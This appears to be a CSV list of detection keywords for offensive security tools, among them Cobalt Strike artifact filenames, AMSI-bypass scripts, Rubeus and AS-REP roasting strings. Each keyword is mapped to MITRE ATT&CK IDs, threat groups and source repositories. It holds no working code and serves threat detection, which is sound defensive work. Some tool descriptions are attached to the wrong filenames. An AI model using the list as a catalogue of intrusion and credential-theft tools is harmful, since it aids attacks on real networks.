-*artifact32.dll*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*artifact32.exe*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z
-*artifact32.exe*,offensive_tool_keyword,cobaltstrike,default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*artifact32big.dll*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z
-*artifact32big.exe*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z
-*artifact32svc.exe*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z
-*artifact32svcbig.exe*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z
-*artifact64*.exe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*artifact64.dll*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*artifact64.exe*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z
-*artifact64.x64.dll*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z
-*artifact64big.exe*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z
-*artifact64big.x64.dll*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z
-*artifact64svc.exe*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z
-*artifact64svcbig.exe*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z
-*artifactbig64.exe*,offensive_tool_keyword,cobaltstrike,default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*artifactuac*.dll*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*aruba2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*AS 'Login that can be impersonated'*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z
-*as 'Owner that can be impersonated'*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z
-*ASBBypass.ps1*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z
-*ASBBypass.ps1*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z
-*ASBBypass.ps1*,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/trustedsec/unicorn,1,1,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z
-*ASRenum-BOF.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mlcsec/ASRenum-BOF,1,1,N/A,10,10,121,15,2022-12-28T17:27:18Z,2022-12-28T14:41:02Z
-*asrep_attack*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018
- T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*asrep2kirbi*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*asreprc4_attack*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*asreproast /*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z 